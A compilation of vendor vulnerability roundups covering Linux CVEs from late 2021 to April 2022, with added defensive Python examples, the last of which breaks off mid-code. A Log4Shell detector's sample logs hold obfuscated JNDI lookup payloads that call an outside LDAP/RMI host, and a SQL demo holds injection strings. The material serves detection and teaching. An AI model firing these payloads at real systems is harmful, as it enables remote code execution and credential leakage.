Top Linux Vulnerabilities for April 2022

By News


Explore the top Linux vulnerabilities for April 2022 and find out the best solution for managing these threats.

1. CVE-2022-0435

Severity: Critical | CVSS Score: 9.0

A stack overflow flaw was found in the Linux kernel’s TIPC protocol functionality in the way it handles a received domain record: a packet whose number of domain member nodes is higher than the 64 allowed overflows a fixed-size stack buffer. This flaw allows a remote user with access to the TIPC network to crash the system or possibly escalate their privileges.

The highest threat from this vulnerability is to confidentiality, integrity, and to system availability.

Syxscore Risk Alert

This vulnerability has a critical risk as this flaw can be exposed over any network, with low attack complexity, and with low privilege requirements.

2. CVE-2022-0492

Severity: Important | CVSS Score: 7.8

A vulnerability was found in the cgroup_release_agent_write function in kernel/cgroup/cgroup-v1.c in the Linux kernel. Under certain circumstances it allows the cgroups v1 release_agent feature to be used to escalate privileges and unexpectedly bypass namespace isolation.

The highest threat from this vulnerability is to confidentiality, integrity, and to system availability.

Syxscore Risk Alert

This vulnerability has a high risk as this flaw can be exploited with low attack complexity and low privileges. It does require local access to the system (a shell or a container on the host) to exploit, which lowers the overall associated risk.
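
A quick triage check for this flaw, run from inside a container, is shown below. It is an added example, not Syxsense’s or the kernel’s code: it reads /proc/self/status and /proc/self/mountinfo and reports whether the process holds CAP_SYS_ADMIN and whether a cgroup v1 hierarchy is mounted read-write (the release_agent file has to be writable). It cannot see whether the running kernel carries the fix, so “exposed” means “patch and re-check”, not “confirmed exploitable”. The two sample inputs, a default Docker container and a --privileged one, are constructed for the demo.

```python
"""Triage check for CVE-2022-0492 exposure from inside a container (added example)."""
import re

CAP_SYS_ADMIN = 21  # bit number from include/uapi/linux/capability.h


def has_cap_sys_admin(status_text: str) -> bool:
    """Parse the CapEff line of /proc/<pid>/status (a hex bitmask)."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)\s*$", status_text, re.MULTILINE)
    if m is None:
        raise ValueError("CapEff line not found")
    return bool(int(m.group(1), 16) & (1 << CAP_SYS_ADMIN))


def rw_cgroup_v1_mounts(mountinfo_text: str) -> list:
    """Mount points of cgroup (v1) filesystems that are writable.

    /proc/self/mountinfo fields: id parent major:minor root mountpoint
    per-mount-options [optional fields...] - fstype source superblock-options.
    Docker's default is a read-only bind of each v1 controller, so both the
    per-mount and the superblock options must say "rw" for a write to
    release_agent to succeed. cgroup2 has no release_agent file at all.
    """
    writable = []
    for line in mountinfo_text.splitlines():
        if " - " not in line:
            continue
        left, right = line.split(" - ", 1)
        lf, rf = left.split(), right.split()
        if len(lf) < 6 or len(rf) < 3:
            continue
        mountpoint, mount_opts = lf[4], lf[5].split(",")
        fstype, super_opts = rf[0], rf[2].split(",")
        if fstype == "cgroup" and "rw" in mount_opts and "rw" in super_opts:
            writable.append(mountpoint)
    return writable


def release_agent_exposure(status_text: str, mountinfo_text: str) -> dict:
    """Both preconditions together; neither alone is enough."""
    cap = has_cap_sys_admin(status_text)
    mounts = rw_cgroup_v1_mounts(mountinfo_text)
    return {"cap_sys_admin": cap, "rw_cgroup_v1": mounts, "exposed": cap and bool(mounts)}


# Constructed samples. The first pair mirrors a default Docker container
# (no CAP_SYS_ADMIN, controllers bind-mounted read-only); the second pair a
# --privileged one (full capability set, hierarchy roots mounted read-write).
DEFAULT_STATUS = (
    "Name:\tsh\nCapInh:\t0000000000000000\nCapPrm:\t00000000a80425fb\n"
    "CapEff:\t00000000a80425fb\n"
)
DEFAULT_MOUNTINFO = (
    "400 380 0:30 /docker/3f1c /sys/fs/cgroup/memory ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory\n"
    "401 380 0:31 /docker/3f1c /sys/fs/cgroup/pids ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,pids\n"
)
PRIVILEGED_STATUS = DEFAULT_STATUS.replace("a80425fb", "3fffffffff")
PRIVILEGED_MOUNTINFO = DEFAULT_MOUNTINFO.replace(" ro,", " rw,").replace("/docker/3f1c", "/")

if __name__ == "__main__":
    for label, st, mi in (("default", DEFAULT_STATUS, DEFAULT_MOUNTINFO),
                          ("privileged", PRIVILEGED_STATUS, PRIVILEGED_MOUNTINFO)):
        print(label, release_agent_exposure(st, mi))
```

On a real host, feed the functions `open("/proc/self/status").read()` and `open("/proc/self/mountinfo").read()`. A container that can also mount a fresh cgroup hierarchy (which needs CAP_SYS_ADMIN) would not show up in the mount check, so treat the capability alone as a reason to look closer.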

3. CVE-2022-28893

Severity: Important | CVSS Score: 7.2

The SUNRPC subsystem in the Linux kernel through 5.17.2 can call xs_xprt_free before ensuring that sockets are in the intended state.

The highest threat from this vulnerability is to confidentiality, integrity, and to system availability.

Syxscore Risk Alert

This vulnerability has a high risk as this flaw can be exploited with low attack complexity, low privileges and no user interaction, but it does require local access to the system.

4. CVE-2022-0998

Severity: Important | CVSS Score: 7.2

An integer overflow flaw was found in the Linux kernel’s virtio device driver code in the way a user triggers the vhost_vdpa_config_validate function. This flaw allows a local user to crash or potentially escalate their privileges on the system.

The highest threat from this vulnerability is to confidentiality, integrity, and to system availability.

Syxscore Risk Alert

This vulnerability has a high risk as this flaw can be exploited with low attack complexity, low privileges and no user interaction, but it does require local access to the system.

5. CVE-2022-0995

Severity: Important | CVSS Score: 6.6

An out-of-bounds (OOB) memory write flaw was found in the Linux kernel’s watch_queue event notification subsystem. This flaw can overwrite parts of the kernel state, potentially allowing a local user to gain privileged access or cause a denial of service on the system.

The highest threat from this vulnerability is to confidentiality and to system availability.

Syxscore Risk Alert

This vulnerability has a high risk as this flaw can be exploited with low attack complexity, low privileges and no user interaction, but it does require local access to the system.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo

Linux Vulnerabilities of the Week: March 7, 2022

By News


See this week's top Linux issues and keep your IT environment protected from the latest March 2022 Linux vulnerabilities.

1. Failure to properly escape SQL input in Cyrus SASL affecting Red Hat Enterprise Linux 6

Severity: Critical         CVSS Score: 9.1

This is a flaw in the SQL plugin shipped with Cyrus SASL 2.1.17 through 2.1.27 (fixed in 2.1.28). Because the plugin does not properly escape the input it places into SQL statements, a remote attacker can execute arbitrary SQL commands. This issue can lead to escalation of privileges.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a critical risk: although it requires high privileges to be exploited, it can be exposed over any network, with low complexity and without user interaction. The changed scope means a successful exploit reaches beyond the vulnerable component (into the backing database), so it can be used for lateral movement.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: High
  • User Interaction: None
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2022-24407

2. Out-of-bounds heap read/write vulnerability in Samba

Severity: Important    CVSS Score: 8.8

Samba versions before 4.13.17, 4.14.12, and 4.15.5 with vfs_fruit configured allow out-of-bounds heap read and write via specially crafted extended file attributes. Due to a boundary error when processing EA metadata while opening files in smbd within the VFS Samba module, a remote attacker with write access to extended file attributes can execute arbitrary code with the privileges of smbd, typically root.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as this can be exposed over any network, with low complexity, low privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-44142

3. Double-free of the virtual attribute context in persistent search in 389-ds-base affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 7.5

This is a double-free in the way 389-ds-base handles the virtual attribute context in persistent searches. An attacker could send a series of search requests that force the server to behave unexpectedly and crash.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a major risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-4091

4. Special character breaks path in XML parsing in PHP

Severity: Medium       CVSS Score: 5.3

This is a flaw in PHP. The main cause of this vulnerability is improper input validation while parsing an Extensible Markup Language (XML) entity: a special character in the path could allow an attacker to traverse directories.

The highest threat from this vulnerability is to confidentiality and integrity.

Syxscore Risk Alert

This vulnerability has a moderate risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-21707

5. RPM’s signature vulnerability

Severity: Low  CVSS Score: 4.4

There is a flaw in RPM’s signature functionality. OpenPGP subkeys are associated with a primary key via a “binding signature”. RPM does not check the binding signature of subkeys before importing them. If an attacker can add, or socially engineer another party to add, a malicious subkey to a legitimate public key, RPM could wrongly trust a malicious signature.

The highest threat from this vulnerability is to data integrity.

Syxscore Risk Alert

This vulnerability has a low risk: although it can be exploited with low privileges, it requires local access to the system, a complex attack and user interaction.

  • Attack Vector: Local
  • Attack Complexity: High
  • Privileges Required: Low
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-3521


Linux Vulnerabilities of the Week: February 14, 2022

By News


See this week's top Linux issues and keep your IT environment protected from the latest February 2022 Linux vulnerabilities.

1. Integer overflow in function XML_GetBuffer in Expat (<2.4.4) affecting Red Hat Enterprise Linux 7 and 8

Severity: Critical         CVSS Score: 9.8

Expat (libexpat) before 2.4.4 is susceptible to a software flaw that causes process interruption: when processing many prefixed XML attributes on a single tag, libexpat can terminate unexpectedly due to an integer overflow.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a critical risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2022-23852

2. JMSAppender in Log4j 1.2 flaw

Severity: Important    CVSS Score: 7.5

JMSAppender in Log4j 1.x is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender, which is not the default, and to the attacker’s JNDI LDAP endpoint.

Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack to be exploited, this can be exposed over any network, with low privileges and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-4104

3. ASP.NET Core Kestrel HTTP headers flaw

Severity: Important    CVSS Score: 7.5

This is a flaw in dotnet’s ASP.NET Core Kestrel web server when pooling HTTP/2 and HTTP/3 headers. It allows a remote, unauthenticated attacker to cause a denial of service.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a major risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2022-21986

4. Refcount leak in pep_sock_accept() in net/phonet/pep.c in the Linux kernel through 5.15.8

Severity: Medium       CVSS Score: 5.5

This is a memory leak flaw in the Linux kernel’s PhoNet (Phone Network protocol) functionality. A local user could use this flaw to starve the resources causing a denial of service.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a moderate risk: although it requires local access to the system to be exploited, it can be exposed with a low-complexity attack, low privileges, and without user interaction.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-45095

5. A null pointer dereference in bond_ipsec_add_sa() in the Linux Kernel affecting Red Hat Enterprise Linux 8

Severity: Medium       CVSS Score: 5.5

This is a null pointer dereference in the Linux kernel’s bonding driver in the way a user bonds a non-existing or fake device. This vulnerability allows a local user to crash the system, causing a denial of service.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a moderate risk: although it requires local access to the system to be exploited, it can be exposed with a low-complexity attack, low privileges, and without user interaction.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2022-0286


Linux Vulnerabilities of the Week: February 8, 2022

By News


See this week's top Linux issues and keep your IT environment protected from the latest February 2022 Linux vulnerabilities.

1. SQL injection in Log4j 1.x when the application is configured to use JDBCAppender

Severity: Critical         CVSS Score: 9.8

This is a flaw in the Java logging library Apache Log4j in version 1.x, which makes JDBCAppender vulnerable to SQL injection via untrusted data. A remote attacker can use this vulnerability to run SQL statements in the database if the deployed application is configured to use JDBCAppender with certain interpolation tokens (those that carry attacker-influenced input, such as the logged message, into the SQL statement).

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a critical risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2022-23305
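
The JDBCAppender issue above and the Cyrus SASL SQL plugin issue from the March 7 list are the same class of bug: text the remote party controls is spliced into SQL. The example below is added here and is not Log4j’s or Cyrus SASL’s code. build_log_sql() imitates the JDBCAppender’s textual substitution of pattern tokens such as %m into a configured SQL string, and lookup_user_vulnerable() imitates a credential lookup whose user name is placed into the query as text; sqlite3 stands in for the real database driver, and the table names, queries and the two malicious inputs are constructed for the demo.

```python
"""Token interpolation into SQL versus parameterised statements (added example)."""
import sqlite3

# Shape of a JDBCAppender SQL pattern: %d timestamp, %m message (constructed).
LOG_SQL_PATTERN = "INSERT INTO logs (ts, msg) VALUES ('%d', '%m')"
# Shape of a credential lookup with the user name placed into the text (constructed).
LOOKUP_SQL_PATTERN = "SELECT password FROM users WHERE username = '%u' AND realm = '%r'"


def build_log_sql(pattern: str, ts: str, message: str) -> str:
    """Log4j-1.x-style token substitution: plain text replacement, so any
    quote inside `message` becomes SQL syntax."""
    return pattern.replace("%d", ts).replace("%m", message)


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logs (ts TEXT, msg TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, realm TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'example.org', 's3cret')")
    return conn


def log_vulnerable(conn, ts: str, message: str) -> None:
    conn.execute(build_log_sql(LOG_SQL_PATTERN, ts, message))


def log_safe(conn, ts: str, message: str) -> None:
    # Parameterised: the message travels as data, never as statement text.
    conn.execute("INSERT INTO logs (ts, msg) VALUES (?, ?)", (ts, message))


def lookup_user_vulnerable(conn, username: str, realm: str) -> list:
    sql = LOOKUP_SQL_PATTERN.replace("%u", username).replace("%r", realm)
    return [row[0] for row in conn.execute(sql)]


def lookup_user_safe(conn, username: str, realm: str) -> list:
    return [row[0] for row in conn.execute(
        "SELECT password FROM users WHERE username = ? AND realm = ?", (username, realm))]


# Constructed attacker inputs. The first is a value the application logs
# (say, a failed login name): it closes the VALUES tuple and adds a row of
# its own. The second is an authentication name that makes the WHERE clause
# true for every account.
INJECTED_MESSAGE = "login failed'), ('2022-02-08', 'forged row"
INJECTED_USERNAME = "nobody' OR '1'='1"


def logged_messages(vulnerable: bool) -> list:
    """Rows that end up in the logs table after logging INJECTED_MESSAGE once."""
    conn = fresh_db()
    (log_vulnerable if vulnerable else log_safe)(conn, "2022-02-08", INJECTED_MESSAGE)
    return [row[0] for row in conn.execute("SELECT msg FROM logs ORDER BY rowid")]


def leaked_passwords(vulnerable: bool) -> list:
    """Passwords returned for the injected user name."""
    conn = fresh_db()
    lookup = lookup_user_vulnerable if vulnerable else lookup_user_safe
    return lookup(conn, INJECTED_USERNAME, "example.org")


if __name__ == "__main__":
    print("JDBCAppender-style:", logged_messages(True), "vs", logged_messages(False))
    print("SASL-style lookup:", leaked_passwords(True), "vs", leaked_passwords(False))
```

The vulnerable log call inserts two rows from one message; the parameterised call stores the whole attacker string as a single literal. Escaping quotes (the approach the Cyrus SASL fix took) also works, but it has to be done with the driver’s escaping function for the exact database dialect, which is why bound parameters are the safer default.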

2. A heap-based buffer overflow vulnerability in AIDE (<0.17.4) affecting Red Hat Enterprise Linux 6, 7 and 8

Severity: Important    CVSS Score: 7.8

AIDE allows local users to obtain root privileges via crafted file metadata (such as XFS extended attributes or tmpfs ACLs), crash the program, and possibly execute arbitrary code, because of a heap-based buffer overflow.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk: although it requires local access to the system to be exploited, it can be exposed with a low-complexity attack, low privileges and without user interaction.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-45417


3. An uncontrolled resource consumption flaw in Go (< 1.16.12)

Severity: Important    CVSS Score: 7.5

This is a flaw in the canonicalHeader() function of Go’s net/http library. It allows an attacker who submits specially crafted requests to applications linked with net/http’s HTTP/2 functionality to cause excessive resource consumption that could lead to a denial of service or otherwise impact system performance and resources.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a major risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-44716

4. Libreswan (4.2 through 4.5) flaw

Severity: Important    CVSS Score: 7.5

This is a flaw in Libreswan that remote attackers could exploit to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted IKEv1 packet because pluto/ikev1.c wrongly expects that a state object exists. This is fixed in 4.6.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a major risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2022-23094

5. Incorrect IdentityHashMap size checks during deserialization in OpenJDK

Severity: Medium       CVSS Score: 5.3

This is an easily exploitable flaw in the Libraries component of Oracle Java SE and Oracle GraalVM Enterprise Edition (and the corresponding OpenJDK builds). It allows an unauthenticated attacker with network access via multiple protocols to cause a partial denial of service of the affected Java runtime.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a moderate risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2022-21294


Linux Vulnerabilities of the Week: January 10, 2022

By News


See this week's top Linux issues and keep your IT environment protected from the latest January 2022 Linux vulnerabilities.

1. Mozilla iframe sandbox rules vulnerability

Severity: Critical         CVSS Score: 10.0

Due to incorrect application of iframe sandbox rules to XSLT stylesheets, an iframe can bypass restrictions such as executing scripts or navigating the top-level frame. This vulnerability affects Firefox < 94, Thunderbird < 91.3, and Firefox ESR < 91.3.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a critical risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-38503

2. Possible buffer overflow in the mod_lua multipart parser affecting Red Hat Enterprise Linux 7 and 8

Severity: Important    CVSS Score: 9.8

A buffer overflow flaw in httpd’s Lua module could allow an out-of-bounds write. The Apache httpd team is not aware of an exploit for the vulnerability though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a critical risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-44790

3. Remote code execution in Log4j 1.x affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 7.5

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker’s JNDI LDAP endpoint.

This issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached the end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack to be exploited, it can be exposed over any network, with low privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-4104

4. Read buffer overruns processing ASN.1 strings in OpenSSL

Severity: Important    CVSS Score: 7.4

It was found that OpenSSL assumed ASN.1 strings to be NUL terminated. An attacker may be able to force an application into calling an OpenSSL function with a specially crafted, non-NUL-terminated string to deliberately hit this bug, which may result in a crash of the application (a denial of service) or possibly memory disclosure.

The highest threat from this vulnerability is to data confidentiality and system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack to be exploited, it can be exposed over any network, with no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-3712

5. Python-lxml’s HTML flaw affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 7.1

There’s a flaw in python-lxml’s HTML Cleaner component, which is responsible for sanitizing HTML and JavaScript.

An attacker who can submit a crafted payload to a web service using python-lxml’s HTML Cleaner may be able to trigger script execution in clients such as web browsers.

The highest threat from this vulnerability is to integrity.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires user interaction to be exploited, it can be exposed over any network, with a low complexity attack, and without privileges. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-43818


Linux Vulnerabilities of the Week: December 20, 2021

By News


See this week's top Linux issues and keep your IT environment protected from the latest December Linux vulnerabilities.

1. Apache Log4j logging library vulnerability

Severity: Critical         CVSS Score: 10.0

This is a flaw in the Apache Log4j 2 logging library that allows an attacker who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a critical risk as this can be exposed over any network, with low complexity, low privileges, and without user interaction. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-44228
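
Because Log4j 2 resolves ${...} lookups from the inside out, attackers hid the jndi: prefix in access logs as ${lower:J}ndi, ${::-j}ndi (an empty lookup falling back to its default value) and similar. The detector below, an added example and not Log4j’s code, normalises those forms (lower, upper, and the :-default fallback of any other lookup) before matching, so it finds the obfuscated payloads as well as the plain one. It is a detector, not a reimplementation of Log4j’s substitution engine; the log lines are constructed.

```python
"""Detect JNDI lookup strings, including nested-lookup obfuscation (added example)."""
import re

INNERMOST = re.compile(r"\$\{([^${}]*)\}")           # a ${...} with nothing nested inside
JNDI = re.compile(r"\$\{\s*jndi:[^}]*\}", re.IGNORECASE)


def _resolve(m):
    """Collapse one obfuscating lookup; leave anything else (including jndi) untouched."""
    body = m.group(1)
    if ":-" in body:
        head, default = body.split(":-", 1)
    else:
        head, default = body, None
    prefix, _, key = head.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if default is not None and prefix != "jndi":
        return default            # e.g. ${::-j} -> "j", ${env:NOPE:-n} -> "n"
    return m.group(0)             # keep ${jndi:...} and ${env:HOME} as they are


def normalise(text: str, max_rounds: int = 32) -> str:
    """Resolve innermost obfuscating lookups until nothing changes (bounded)."""
    for _ in range(max_rounds):
        new = INNERMOST.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def scan(lines) -> list:
    """Return (line index, normalised JNDI payload) for every hit."""
    hits = []
    for i, line in enumerate(lines):
        for m in JNDI.finditer(normalise(line)):
            hits.append((i, m.group(0)))
    return hits


# Constructed access-log lines: one benign request, three JNDI probes of
# increasing obfuscation, and a benign line that merely contains a lookup.
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 200 "-" "${${lower:J}ndi:${lower:L}dap://203.0.113.7:1389/b}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:04 +0000] "GET /api HTTP/1.1" 404 "-" "${${::-j}${::-n}${::-d}${::-i}:${env:NOPE:-r}mi://203.0.113.7:1099/c}"',
    'app[1234]: config path=${env:HOME}/.app loaded',
]

if __name__ == "__main__":
    for idx, payload in scan(SAMPLE_LOG):
        print(f"line {idx}: {payload}")
```

Run it over real access logs with `scan(open(path, errors="replace"))`. The normalisation is deliberately bounded (max_rounds) so a line built to nest thousands of lookups cannot turn the detector itself into a CPU sink.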

2. Java logging library Apache Log4j (version 1.x) flaw affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 8.1

JMSAppender in Log4j 1.x is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker’s JMS Broker.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack to be exploited, it can be exposed over any network, without privileges and user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-4104

3. STARTTLS session encryption bypassing in Fetchmail (< 6.4.22) affecting Red Hat Enterprise Linux 8

Severity: Medium       CVSS Score: 5.9

Fetchmail before 6.4.22 fails to enforce STARTTLS session encryption in some circumstances, such as a certain situation with IMAP and PREAUTH.

The highest threat from this vulnerability is to data confidentiality.

Syxscore Risk Alert

This vulnerability has a moderate risk as although this requires a complex attack to be exploited, it can be exposed over any network, without privileges and user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-39272

4. RESTEasy (<4.6.0.Final) vulnerability

Severity: Medium       CVSS Score: 5.3

This is a flaw in all versions of RESTEasy up to 4.6.0.Final. The endpoint class and method names are returned as part of the exception response when RESTEasy cannot convert one of the request URI path or query values to the matching JAX-RS resource method’s parameter value.

The highest threat from this vulnerability is to data confidentiality.

Syxscore Risk Alert

This vulnerability has a moderate risk as this can be exposed over any network, with low complexity, low privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-20289


Linux Vulnerabilities of the Week: December 6, 2021

By News


See this week's top Linux issues and keep your IT environment protected from the latest December Linux vulnerabilities.

1. CSRF token bypass in Mailman (<2.1.38)

Severity: Important    CVSS Score: 8.8

A Cross-Site Request Forgery (CSRF) attack can be performed in GNU Mailman due to a CSRF token bypass.

CSRF tokens are not checked against the right type of user when performing admin operations and a token created by a regular user can be used by an admin to perform an admin-level request to set a new admin password or make other changes.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as though it requires user interaction, this can be exposed over any network, with low complexity, and without privileges.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-44227
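
The property the Mailman fix restores is that a token carries the role it was issued for and is rejected for any request that needs a higher one. The example below, added here and not Mailman’s code, implements that with an HMAC-SHA256 over list|user|role|expiry under a server-side secret; the secret, list name, user name and timestamp are constructed for the demo.

```python
"""Role-bound CSRF tokens: a member token must not authorise admin actions (added example)."""
import base64
import hashlib
import hmac
import time

ROLE_RANK = {"member": 0, "moderator": 1, "admin": 2}
TTL_SECONDS = 3600


def mint_token(secret: bytes, listname: str, user: str, role: str, now: float = None) -> str:
    """Issue a token for one (list, user, role); the role is part of the signed payload."""
    if role not in ROLE_RANK:
        raise ValueError("unknown role")
    if any("|" in field for field in (listname, user)):
        raise ValueError("separator in field")
    exp = int((time.time() if now is None else now) + TTL_SECONDS)
    payload = f"{listname}|{user}|{role}|{exp}".encode()
    mac = hmac.new(secret, payload, hashlib.sha256).hexdigest().encode()
    return base64.urlsafe_b64encode(payload + b"|" + mac).decode()


def verify_token(secret: bytes, token: str, listname: str, user: str,
                 required_role: str, now: float = None) -> bool:
    """True only if the token is genuine, unexpired, for this user, and its role covers the action."""
    if required_role not in ROLE_RANK:
        raise ValueError("unknown role")
    try:
        raw = base64.urlsafe_b64decode(token.encode())
        t_list, t_user, t_role, t_exp, t_mac = raw.decode().split("|")
    except (ValueError, UnicodeDecodeError):
        return False
    payload = f"{t_list}|{t_user}|{t_role}|{t_exp}".encode()
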